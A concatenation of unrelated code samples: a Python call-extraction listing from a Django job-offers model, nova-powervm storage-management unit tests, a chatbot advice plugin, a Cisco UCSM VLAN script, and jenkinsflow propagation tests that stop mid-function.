'django.utils.translation.gettext', '_', (['"""Cooperativa de trabajo"""'], {}), "('Cooperativa de trabajo')\n", (1775, 1801), True, 'from django.utils.translation import gettext as _\n'), ((1833, 1844), 'django.utils.translation.gettext', '_', (['"""Estado"""'], {}), "('Estado')\n", (1834, 1844), True, 'from django.utils.translation import gettext as _\n'), ((1866, 1875), 'django.utils.translation.gettext', '_', (['"""Otra"""'], {}), "('Otra')\n", (1867, 1875), True, 'from django.utils.translation import gettext as _\n'), ((1981, 1991), 'django.utils.translation.gettext', '_', (['"""Nuevo"""'], {}), "('Nuevo')\n", (1982, 1991), True, 'from django.utils.translation import gettext as _\n'), ((2050, 2066), 'django.utils.translation.gettext', '_', (['"""Desactivada"""'], {}), "('Desactivada')\n", (2051, 2066), True, 'from django.utils.translation import gettext as _\n'), ((2098, 2116), 'django.utils.translation.gettext', '_', (['"""En moderación"""'], {}), "('En moderación')\n", (2099, 2116), True, 'from django.utils.translation import gettext as _\n'), ((2140, 2151), 'django.utils.translation.gettext', '_', (['"""Activa"""'], {}), "('Activa')\n", (2141, 2151), True, 'from django.utils.translation import gettext as _\n'), ((2179, 2193), 'django.utils.translation.gettext', '_', (['"""Rechazada"""'], {}), "('Rechazada')\n", (2180, 2193), True, 'from django.utils.translation import gettext as _\n'), ((2219, 2232), 'django.utils.translation.gettext', '_', (['"""Caducada"""'], {}), "('Caducada')\n", (2220, 2232), True, 'from django.utils.translation import gettext as _\n'), ((4609, 4662), 'django.urls.reverse', 'reverse', (['"""joboffers:view"""'], {'kwargs': "{'slug': self.slug}"}), "('joboffers:view', kwargs={'slug': self.slug})\n", (4616, 4662), False, 'from django.urls import reverse\n'), ((5163, 5198), 're.sub', 're.sub', (['"""<[^>]*>"""', '""" """', 'description'], {}), "('<[^>]*>', ' ', description)\n", (5169, 5198), False, 'import re\n'), ((5324, 5365), 
'html.unescape', 'html.unescape', (['description_without_spaces'], {}), '(description_without_spaces)\n', (5337, 5365), False, 'import html\n'), ((5604, 5616), 'datetime.date.today', 'date.today', ([], {}), '()\n', (5614, 5616), False, 'from datetime import date\n'), ((6158, 6213), 'pycompanies.models.UserCompanyProfile.objects.filter', 'UserCompanyProfile.objects.filter', ([], {'company': 'self.company'}), '(company=self.company)\n', (6191, 6213), False, 'from pycompanies.models import UserCompanyProfile\n'), ((6886, 6905), 'django.utils.text.slugify', 'slugify', (['self.title'], {}), '(self.title)\n', (6893, 6905), False, 'from django.utils.text import slugify\n'), ((8341, 8356), 'django.utils.translation.gettext', '_', (['"""Moderación"""'], {}), "('Moderación')\n", (8342, 8356), True, 'from django.utils.translation import gettext as _\n'), ((8382, 8394), 'django.utils.translation.gettext', '_', (['"""Edición"""'], {}), "('Edición')\n", (8383, 8394), True, 'from django.utils.translation import gettext as _\n'), ((8414, 8423), 'django.utils.translation.gettext', '_', (['"""Spam"""'], {}), "('Spam')\n", (8415, 8423), True, 'from django.utils.translation import gettext as _\n'), ((8457, 8486), 'django.utils.translation.gettext', '_', (['"""Información insuficiente"""'], {}), "('Información insuficiente')\n", (8458, 8486), True, 'from django.utils.translation import gettext as _\n'), ((8519, 8556), 'django.utils.translation.gettext', '_', (['"""Oferta no relacionada con Python"""'], {}), "('Oferta no relacionada con Python')\n", (8520, 8556), True, 'from django.utils.translation import gettext as _\n'), ((9722, 9786), 'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""joboffers"""', 'model': '"""joboffer"""'}), "(app_label='joboffers', model='joboffer')\n", (9745, 9786), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((9817, 9888), 
'django.contrib.contenttypes.models.ContentType.objects.get', 'ContentType.objects.get', ([], {'app_label': '"""joboffers"""', 'model': '"""joboffercomment"""'}), "(app_label='joboffers', model='joboffercomment')\n", (9840, 9888), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((9930, 10005), 'django.db.models.Q', 'models.Q', ([], {'event_type__lt': '(4)', 'object_id': 'joboffer.id', 'content_type': 'offer_ctype'}), '(event_type__lt=4, object_id=joboffer.id, content_type=offer_ctype)\n', (9938, 10005), False, 'from django.db import models\n'), ((10159, 10234), 'django.db.models.Q', 'models.Q', ([], {'object_id__in': 'offer_comment_ids', 'content_type': 'offer_comment_ctype'}), '(object_id__in=offer_comment_ids, content_type=offer_comment_ctype)\n', (10167, 10234), False, 'from django.db import models\n'), ((10777, 10810), 'json.loads', 'json.loads', (['self.object_json_repr'], {}), '(self.object_json_repr)\n', (10787, 10810), False, 'import json\n'), ((2359, 2370), 'django.utils.translation.gettext', '_', (['"""Título"""'], {}), "('Título')\n", (2360, 2370), True, 'from django.utils.translation import gettext as _\n'), ((2512, 2524), 'django.utils.translation.gettext', '_', (['"""Empresa"""'], {}), "('Empresa')\n", (2513, 2524), True, 'from django.utils.translation import gettext as _\n'), ((2650, 2660), 'django.utils.translation.gettext', '_', (['"""Lugar"""'], {}), "('Lugar')\n", (2651, 2660), True, 'from django.utils.translation import gettext as _\n'), ((2760, 2771), 'django.utils.translation.gettext', '_', (['"""E-mail"""'], {}), "('E-mail')\n", (2761, 2771), True, 'from django.utils.translation import gettext as _\n'), ((2876, 2889), 'django.utils.translation.gettext', '_', (['"""Teléfono"""'], {}), "('Teléfono')\n", (2877, 2889), True, 'from django.utils.translation import gettext as _\n'), ((2992, 3009), 'django.utils.translation.gettext', '_', (['"""URL Contacto"""'], {}), "('URL Contacto')\n", (2993, 3009), True, 'from 
django.utils.translation import gettext as _\n'), ((3114, 3130), 'django.utils.translation.gettext', '_', (['"""Experiencia"""'], {}), "('Experiencia')\n", (3115, 3130), True, 'from django.utils.translation import gettext as _\n'), ((3236, 3261), 'django.utils.translation.gettext', '_', (['"""Modalidad de trabajo"""'], {}), "('Modalidad de trabajo')\n", (3237, 3261), True, 'from django.utils.translation import gettext as _\n'), ((3308, 3322), 'django.utils.translation.gettext', '_', (['"""Etiquetas"""'], {}), "('Etiquetas')\n", (3309, 3322), True, 'from django.utils.translation import gettext as _\n'), ((3436, 3461), 'django.utils.translation.gettext', '_', (['"""Tipo de contratación"""'], {}), "('Tipo de contratación')\n", (3437, 3461), True, 'from django.utils.translation import gettext as _\n'), ((3547, 3566), 'django.utils.translation.gettext', '_', (['"""Rango salarial"""'], {}), "('Rango salarial')\n", (3548, 3566), True, 'from django.utils.translation import gettext as _\n'), ((3621, 3637), 'django.utils.translation.gettext', '_', (['"""Descripción"""'], {}), "('Descripción')\n", (3622, 3637), True, 'from django.utils.translation import gettext as _\n'), ((3726, 3748), 'django.utils.translation.gettext', '_', (['"""Descripción corta"""'], {}), "('Descripción corta')\n", (3727, 3748), True, 'from django.utils.translation import gettext as _\n'), ((3834, 3855), 'django.utils.translation.gettext', '_', (['"""Hora de creación"""'], {}), "('Hora de creación')\n", (3835, 3855), True, 'from django.utils.translation import gettext as _\n'), ((3987, 4002), 'django.utils.translation.gettext', '_', (['"""Creado por"""'], {}), "('Creado por')\n", (3988, 4002), True, 'from django.utils.translation import gettext as _\n'), ((4116, 4141), 'django.utils.translation.gettext', '_', (['"""Hora de Modificación"""'], {}), "('Hora de Modificación')\n", (4117, 4141), True, 'from django.utils.translation import gettext as _\n'), ((4269, 4288), 'django.utils.translation.gettext', 
'_', (['"""Modificado por"""'], {}), "('Modificado por')\n", (4270, 4288), True, 'from django.utils.translation import gettext as _\n'), ((4470, 4494), 'django.utils.translation.gettext', '_', (['"""Estado de la oferta"""'], {}), "('Estado de la oferta')\n", (4471, 4494), True, 'from django.utils.translation import gettext as _\n'), ((8682, 8692), 'django.utils.translation.gettext', '_', (['"""Texto"""'], {}), "('Texto')\n", (8683, 8692), True, 'from django.utils.translation import gettext as _\n'), ((8796, 8805), 'django.utils.translation.gettext', '_', (['"""Tipo"""'], {}), "('Tipo')\n", (8797, 8805), True, 'from django.utils.translation import gettext as _\n'), ((8886, 8905), 'django.utils.translation.gettext', '_', (['"""Rango salarial"""'], {}), "('Rango salarial')\n", (8887, 8905), True, 'from django.utils.translation import gettext as _\n'), ((9037, 9052), 'django.utils.translation.gettext', '_', (['"""Creado por"""'], {}), "('Creado por')\n", (9038, 9052), True, 'from django.utils.translation import gettext as _\n'), ((11396, 11427), 'json.loads', 'json.loads', (['self.changed_fields'], {}), '(self.changed_fields)\n', (11406, 11427), False, 'import json\n'), ((12652, 12671), 'django.utils.translation.gettext', '_', (['"""Tipo de Evento"""'], {}), "('Tipo de Evento')\n", (12653, 12671), True, 'from django.utils.translation import gettext as _\n'), ((12737, 12765), 'django.utils.translation.gettext', '_', (['"""Identificador de Sesión"""'], {}), "('Identificador de Sesión')\n", (12738, 12765), True, 'from django.utils.translation import gettext as _\n'), ((2385, 2407), 'django.core.validators.MinLengthValidator', 'MinLengthValidator', (['(20)'], {}), '(20)\n', (2403, 2407), False, 'from django.core.validators import MinLengthValidator\n'), ((5237, 5283), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'description_stripped_tags'], {}), "('\\\\s+', ' ', description_stripped_tags)\n", (5243, 5283), False, 'import re\n'), ((6732, 6751), 
'django.db.models.aggregates.Count', 'Count', (['"""event_type"""'], {}), "('event_type')\n", (6737, 6751), False, 'from django.db.models.aggregates import Count\n'), ((7655, 7690), 'django.db.models.Q', 'models.Q', ([], {'contact_url__isnull': '(False)'}), '(contact_url__isnull=False)\n', (7663, 7690), False, 'from django.db import models\n'), ((8127, 8165), 'django.db.models.Q', 'models.Q', ([], {'remoteness': 'Remoteness.REMOTE'}), '(remoteness=Remoteness.REMOTE)\n', (8135, 8165), False, 'from django.db import models\n'), ((7442, 7478), 'django.db.models.Q', 'models.Q', ([], {'contact_mail__isnull': '(False)'}), '(contact_mail__isnull=False)\n', (7450, 7478), False, 'from django.db import models\n'), ((7548, 7585), 'django.db.models.Q', 'models.Q', ([], {'contact_phone__isnull': '(False)'}), '(contact_phone__isnull=False)\n', (7556, 7585), False, 'from django.db import models\n'), ((7960, 8023), 'django.db.models.Q', 'models.Q', ([], {'remoteness__in': '(Remoteness.HYBRID, Remoteness.OFFICE)'}), '(remoteness__in=(Remoteness.HYBRID, Remoteness.OFFICE))\n', (7968, 8023), False, 'from django.db import models\n'), ((8050, 8082), 'django.db.models.Q', 'models.Q', ([], {'location__isnull': '(False)'}), '(location__isnull=False)\n', (8058, 8082), False, 'from django.db import models\n')] |
# Copyright 2015, 2017 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import retrying
from nova import exception
from nova import test
from pypowervm.tests import test_fixtures as pvm_fx
from pypowervm.tests.test_utils import pvmhttp
from nova_powervm.virt.powervm import exception as npvmex
from nova_powervm.virt.powervm import mgmt
LPAR_HTTPRESP_FILE = "lpar.txt"
class TestMgmt(test.NoDBTestCase):
def setUp(self):
super(TestMgmt, self).setUp()
self.apt = self.useFixture(pvm_fx.AdapterFx()).adpt
lpar_http = pvmhttp.load_pvm_resp(LPAR_HTTPRESP_FILE, adapter=self.apt)
self.assertNotEqual(lpar_http, None,
"Could not load %s " % LPAR_HTTPRESP_FILE)
self.resp = lpar_http.response
@mock.patch('pypowervm.tasks.partition.get_this_partition', autospec=True)
def test_mgmt_uuid(self, mock_get_partition):
mock_get_partition.return_value = mock.Mock(uuid='mock_mgmt')
adpt = mock.Mock()
# First run should call the partition only once
self.assertEqual('mock_mgmt', mgmt.mgmt_uuid(adpt))
mock_get_partition.assert_called_once_with(adpt)
# But a subsequent call should effectively no-op
mock_get_partition.reset_mock()
self.assertEqual('mock_mgmt', mgmt.mgmt_uuid(adpt))
self.assertEqual(0, mock_get_partition.call_count)
@mock.patch('glob.glob', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
@mock.patch('os.path.realpath', autospec=True)
def test_discover_vscsi_disk(self, mock_realpath, mock_dacw, mock_glob):
scanpath = '/sys/bus/vio/devices/30000005/host*/scsi_host/host*/scan'
udid = ('275b5d5f88fa5611e48be9000098be9400'
'13fb2aa55a2d7b8d150cb1b7b6bc04d6')
devlink = ('/dev/disk/by-id/scsi-SIBM_3303_NVDISK' + udid)
mapping = mock.Mock()
mapping.client_adapter.lpar_slot_num = 5
mapping.backing_storage.udid = udid
# Realistically, first glob would return e.g. .../host0/.../host0/...
# but it doesn't matter for test purposes.
mock_glob.side_effect = [[scanpath], [devlink]]
mgmt.discover_vscsi_disk(mapping)
mock_glob.assert_has_calls(
[mock.call(scanpath), mock.call('/dev/disk/by-id/*' + udid[-32:])])
mock_dacw.assert_called_with(scanpath, 'a', '- - -')
mock_realpath.assert_called_with(devlink)
@mock.patch('retrying.retry', autospec=True)
@mock.patch('glob.glob', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
def test_discover_vscsi_disk_not_one_result(self, mock_write, mock_glob,
mock_retry):
"""Zero or more than one disk is found by discover_vscsi_disk."""
def validate_retry(kwargs):
self.assertIn('retry_on_result', kwargs)
self.assertEqual(250, kwargs['wait_fixed'])
self.assertEqual(300000, kwargs['stop_max_delay'])
def raiser(unused):
raise retrying.RetryError(mock.Mock(attempt_number=123))
def retry_passthrough(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_dev):
return _poll_for_dev
return wrapped
def retry_timeout(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_dev):
return raiser
return wrapped
udid = ('275b5d5f88fa5611e48be9000098be9400'
'13fb2aa55a2d7b8d150cb1b7b6bc04d6')
mapping = mock.Mock()
mapping.client_adapter.lpar_slot_num = 5
mapping.backing_storage.udid = udid
# No disks found
mock_retry.side_effect = retry_timeout
mock_glob.side_effect = lambda path: []
self.assertRaises(npvmex.NoDiskDiscoveryException,
mgmt.discover_vscsi_disk, mapping)
# Multiple disks found
mock_retry.side_effect = retry_passthrough
mock_glob.side_effect = [['path'], ['/dev/sde', '/dev/sdf']]
self.assertRaises(npvmex.UniqueDiskDiscoveryException,
mgmt.discover_vscsi_disk, mapping)
@mock.patch('time.sleep', autospec=True)
@mock.patch('os.path.realpath', autospec=True)
@mock.patch('os.stat', autospec=True)
@mock.patch('nova.privsep.path.writefile', autospec=True)
def test_remove_block_dev(self, mock_dacw, mock_stat, mock_realpath,
mock_sleep):
link = '/dev/link/foo'
realpath = '/dev/sde'
delpath = '/sys/block/sde/device/delete'
mock_realpath.return_value = realpath
# Good path
mock_stat.side_effect = (None, None, OSError())
mgmt.remove_block_dev(link)
mock_realpath.assert_called_with(link)
mock_stat.assert_has_calls([mock.call(realpath), mock.call(delpath),
mock.call(realpath)])
mock_dacw.assert_called_with(delpath, 'a', '1')
self.assertEqual(0, mock_sleep.call_count)
# Device param not found
mock_dacw.reset_mock()
mock_stat.reset_mock()
mock_stat.side_effect = (OSError(), None, None)
self.assertRaises(exception.InvalidDevicePath, mgmt.remove_block_dev,
link)
# stat was called once; privsep write was not called
self.assertEqual(1, mock_stat.call_count)
mock_dacw.assert_not_called()
# Delete special file not found
mock_stat.reset_mock()
mock_stat.side_effect = (None, OSError(), None)
self.assertRaises(exception.InvalidDevicePath, mgmt.remove_block_dev,
link)
# stat was called twice; privsep write was not called
self.assertEqual(2, mock_stat.call_count)
mock_dacw.assert_not_called()
@mock.patch('retrying.retry')
@mock.patch('os.path.realpath')
@mock.patch('os.stat')
@mock.patch('nova.privsep.path.writefile')
def test_remove_block_dev_timeout(self, mock_dacw, mock_stat,
mock_realpath, mock_retry):
def validate_retry(kwargs):
self.assertIn('retry_on_result', kwargs)
self.assertEqual(250, kwargs['wait_fixed'])
self.assertEqual(10000, kwargs['stop_max_delay'])
def raiser(unused):
raise retrying.RetryError(mock.Mock(attempt_number=123))
def retry_timeout(**kwargs):
validate_retry(kwargs)
def wrapped(_poll_for_del):
return raiser
return wrapped
# Deletion was attempted, but device is still there
link = '/dev/link/foo'
delpath = '/sys/block/sde/device/delete'
realpath = '/dev/sde'
mock_realpath.return_value = realpath
mock_stat.side_effect = lambda path: 1
mock_retry.side_effect = retry_timeout
self.assertRaises(
npvmex.DeviceDeletionException, mgmt.remove_block_dev, link)
mock_realpath.assert_called_once_with(link)
mock_dacw.assert_called_with(delpath, 'a', '1')
| [
"mock.patch",
"mock.Mock",
"nova_powervm.virt.powervm.mgmt.discover_vscsi_disk",
"nova_powervm.virt.powervm.mgmt.remove_block_dev",
"pypowervm.tests.test_utils.pvmhttp.load_pvm_resp",
"mock.call",
"nova_powervm.virt.powervm.mgmt.mgmt_uuid",
"pypowervm.tests.test_fixtures.AdapterFx"
] | [((1344, 1417), 'mock.patch', 'mock.patch', (['"""pypowervm.tasks.partition.get_this_partition"""'], {'autospec': '(True)'}), "('pypowervm.tasks.partition.get_this_partition', autospec=True)\n", (1354, 1417), False, 'import mock\n'), ((1962, 2000), 'mock.patch', 'mock.patch', (['"""glob.glob"""'], {'autospec': '(True)'}), "('glob.glob', autospec=True)\n", (1972, 2000), False, 'import mock\n'), ((2006, 2062), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (2016, 2062), False, 'import mock\n'), ((2068, 2113), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {'autospec': '(True)'}), "('os.path.realpath', autospec=True)\n", (2078, 2113), False, 'import mock\n'), ((3025, 3068), 'mock.patch', 'mock.patch', (['"""retrying.retry"""'], {'autospec': '(True)'}), "('retrying.retry', autospec=True)\n", (3035, 3068), False, 'import mock\n'), ((3074, 3112), 'mock.patch', 'mock.patch', (['"""glob.glob"""'], {'autospec': '(True)'}), "('glob.glob', autospec=True)\n", (3084, 3112), False, 'import mock\n'), ((3118, 3174), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (3128, 3174), False, 'import mock\n'), ((4796, 4835), 'mock.patch', 'mock.patch', (['"""time.sleep"""'], {'autospec': '(True)'}), "('time.sleep', autospec=True)\n", (4806, 4835), False, 'import mock\n'), ((4841, 4886), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {'autospec': '(True)'}), "('os.path.realpath', autospec=True)\n", (4851, 4886), False, 'import mock\n'), ((4892, 4928), 'mock.patch', 'mock.patch', (['"""os.stat"""'], {'autospec': '(True)'}), "('os.stat', autospec=True)\n", (4902, 4928), False, 'import mock\n'), ((4934, 4990), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {'autospec': '(True)'}), "('nova.privsep.path.writefile', autospec=True)\n", (4944, 4990), False, 
'import mock\n'), ((6470, 6498), 'mock.patch', 'mock.patch', (['"""retrying.retry"""'], {}), "('retrying.retry')\n", (6480, 6498), False, 'import mock\n'), ((6504, 6534), 'mock.patch', 'mock.patch', (['"""os.path.realpath"""'], {}), "('os.path.realpath')\n", (6514, 6534), False, 'import mock\n'), ((6540, 6561), 'mock.patch', 'mock.patch', (['"""os.stat"""'], {}), "('os.stat')\n", (6550, 6561), False, 'import mock\n'), ((6567, 6608), 'mock.patch', 'mock.patch', (['"""nova.privsep.path.writefile"""'], {}), "('nova.privsep.path.writefile')\n", (6577, 6608), False, 'import mock\n'), ((1122, 1181), 'pypowervm.tests.test_utils.pvmhttp.load_pvm_resp', 'pvmhttp.load_pvm_resp', (['LPAR_HTTPRESP_FILE'], {'adapter': 'self.apt'}), '(LPAR_HTTPRESP_FILE, adapter=self.apt)\n', (1143, 1181), False, 'from pypowervm.tests.test_utils import pvmhttp\n'), ((1510, 1537), 'mock.Mock', 'mock.Mock', ([], {'uuid': '"""mock_mgmt"""'}), "(uuid='mock_mgmt')\n", (1519, 1537), False, 'import mock\n'), ((1553, 1564), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (1562, 1564), False, 'import mock\n'), ((2459, 2470), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (2468, 2470), False, 'import mock\n'), ((2758, 2791), 'nova_powervm.virt.powervm.mgmt.discover_vscsi_disk', 'mgmt.discover_vscsi_disk', (['mapping'], {}), '(mapping)\n', (2782, 2791), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((4170, 4181), 'mock.Mock', 'mock.Mock', ([], {}), '()\n', (4179, 4181), False, 'import mock\n'), ((5348, 5375), 'nova_powervm.virt.powervm.mgmt.remove_block_dev', 'mgmt.remove_block_dev', (['link'], {}), '(link)\n', (5369, 5375), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((1660, 1680), 'nova_powervm.virt.powervm.mgmt.mgmt_uuid', 'mgmt.mgmt_uuid', (['adpt'], {}), '(adpt)\n', (1674, 1680), False, 'from nova_powervm.virt.powervm import mgmt\n'), ((1875, 1895), 'nova_powervm.virt.powervm.mgmt.mgmt_uuid', 'mgmt.mgmt_uuid', (['adpt'], {}), '(adpt)\n', (1889, 1895), False, 'from 
nova_powervm.virt.powervm import mgmt\n'), ((1076, 1094), 'pypowervm.tests.test_fixtures.AdapterFx', 'pvm_fx.AdapterFx', ([], {}), '()\n', (1092, 1094), True, 'from pypowervm.tests import test_fixtures as pvm_fx\n'), ((2841, 2860), 'mock.call', 'mock.call', (['scanpath'], {}), '(scanpath)\n', (2850, 2860), False, 'import mock\n'), ((2862, 2905), 'mock.call', 'mock.call', (["('/dev/disk/by-id/*' + udid[-32:])"], {}), "('/dev/disk/by-id/*' + udid[-32:])\n", (2871, 2905), False, 'import mock\n'), ((3662, 3691), 'mock.Mock', 'mock.Mock', ([], {'attempt_number': '(123)'}), '(attempt_number=123)\n', (3671, 3691), False, 'import mock\n'), ((5459, 5478), 'mock.call', 'mock.call', (['realpath'], {}), '(realpath)\n', (5468, 5478), False, 'import mock\n'), ((5480, 5498), 'mock.call', 'mock.call', (['delpath'], {}), '(delpath)\n', (5489, 5498), False, 'import mock\n'), ((5536, 5555), 'mock.call', 'mock.call', (['realpath'], {}), '(realpath)\n', (5545, 5555), False, 'import mock\n'), ((7016, 7045), 'mock.Mock', 'mock.Mock', ([], {'attempt_number': '(123)'}), '(attempt_number=123)\n', (7025, 7045), False, 'import mock\n')] |
import random
from plugin import plugin
ANSWERS = [
"No",
"Yes",
"You Can Do It!",
"I Cant Help You",
"Sorry To hear That, But You Must Forget :(",
"Keep It Up!",
"Nice",
"Dont Do It Ever Again",
"I Like It, Good Job",
"I Am Not Certain",
"Too Bad For You, Try To Find Something Else To Do And Enjoy",
"Time Will Pass And You Will Forget",
"Dont Do It",
"Do It",
"Never Ask Me About That Again",
"I Cant Give Advice Now I Am Sleepy",
"Sorry I Cant Hear This Language",
"Sorry But Your Question Does Not Make Sense"
]
@plugin("give me advice")
def advice(jarvis, s):
while True:
question = input("Ask Me A Question : ").strip()
if len(question) > 0 and question[-1] == '?':
break
else:
print("Questions should end with a question mark: ?")
while True:
random_idx = random.randint(0, len(ANSWERS))
print(ANSWERS[random_idx])
while True:
desire = input("Was This In Context? (Y/N) : ")
if desire.strip().lower() == 'n':
print("Its A Pitty :( I'll Try Again!")
break
elif desire.strip().lower() == 'y':
print("Good To hear! Happy To Advice You!")
print("Good Bye!")
return
| [
"plugin.plugin"
] | [((556, 580), 'plugin.plugin', 'plugin', (['"""give me advice"""'], {}), "('give me advice')\n", (562, 580), False, 'from plugin import plugin\n')] |
import argparse
from ucsmsdk.ucshandle import UcsHandle
from ucsmsdk.mometa.vnic.VnicEtherIf import VnicEtherIf
from ucsmsdk.mometa.fabric.FabricVlan import FabricVlan
parser = argparse.ArgumentParser()
parser.add_argument('ucsm_ip')
parser.add_argument('username')
parser.add_argument('password')
parser.add_argument('sp_name')
parser.add_argument('vlan')
parser.add_argument('--remove', action='store_true',
help=("Remove the service profile with name"))
def connect_to_ucsm(args):
handle = UcsHandle(args.ucsm_ip, args.username, args.password)
handle.login()
return handle
def assign_vlan_to_sp_vnic(handle, args):
# Remove any existing ironic-<vlan> vifs from this UCSM server
existing_ironic_vifs = handle.query_classid(
'VnicEtherIf',
filter_str=(
'(name, ".*ironic-.*") and (dn, ".*{0}.*")'.format(args.sp_name))
)
for vif in existing_ironic_vifs:
handle.remove_mo(vif)
handle.commit()
# Add the vlan to UCSM globally if it doesn't already exist
vlan = handle.query_dn('fabric/lan/net-ironic-{0}'.format(args.vlan))
if not vlan:
vp1 = handle.query_dn("fabric/lan")
handle.add_mo(FabricVlan(vp1, name="ironic-{0}".format(args.vlan),
id=args.vlan))
handle.commit()
# Add the the VLAN as the default network for the first NIC on the server
eth0 = handle.query_classid(
'VnicEther', filter_str='(dn, ".*{0}.*")'.format(args.sp_name))[0]
VnicEtherIf(parent_mo_or_dn=eth0, default_net="yes",
name="ironic-{0}".format(args.vlan))
handle.set_mo(eth0)
handle.commit()
if __name__ == '__main__':
args = parser.parse_args()
handle = connect_to_ucsm(args)
assign_vlan_to_sp_vnic(handle, args)
| [
"ucsmsdk.ucshandle.UcsHandle",
"argparse.ArgumentParser"
] | [((178, 203), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (201, 203), False, 'import argparse\n'), ((520, 573), 'ucsmsdk.ucshandle.UcsHandle', 'UcsHandle', (['args.ucsm_ip', 'args.username', 'args.password'], {}), '(args.ucsm_ip, args.username, args.password)\n', (529, 573), False, 'from ucsmsdk.ucshandle import UcsHandle\n')] |
# Copyright (c) 2012 - 2015 <NAME>, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
from pytest import raises
from jenkinsflow.flow import serial, parallel, FailedChildJobException, FailedChildJobsException, Propagation, BuildResult
from .framework import api_select
from .framework.utils import pre_existing_fake_cli
def test_propagation_warn_only_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j12_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2, serial=True)
api.job('j13', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl1:
ctrl1.invoke('j11')
ctrl1.invoke('j12_fail')
ctrl1.invoke('j13')
assert ctrl1.result == BuildResult.UNSTABLE
# Note: the fact that no error was raised also implies that the failure didn't propagate as failure
def test_propagation_warn_only_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j1_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1)
api.job('j2', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3, propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl1:
ctrl1.invoke('j1_fail')
ctrl1.invoke('j2')
def test_propagation_warn_only_nested_serial_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2, serial=True)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.parallel(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=1, serial=True)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with parallel(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_serial_serial(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=2)
api.job('j22_fail', exec_time=0.01, max_fails=1, expect_invocations=1, expect_order=2)
api.job('j23', exec_time=0.01, max_fails=0, expect_invocations=0, expect_order=None)
with serial(api, timeout=70, job_name_prefix=api.job_name_prefix, report_interval=3) as ctrl1:
ctrl1.invoke('j11')
with ctrl1.serial(propagation=Propagation.FAILURE_TO_UNSTABLE) as ctrl2:
ctrl2.invoke('j21')
ctrl2.invoke('j22_fail')
ctrl2.invoke('j23')
def test_propagation_warn_only_nested_parallel_parallel(api_type, fake_java):
with api_select.api(__file__, api_type, login=True) as api:
pre_existing_fake_cli(api_type)
api.flow_job()
api.job('j11', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
api.job('j21', exec_time=0.01, max_fails=0, expect_invocations=1, expect_order=1)
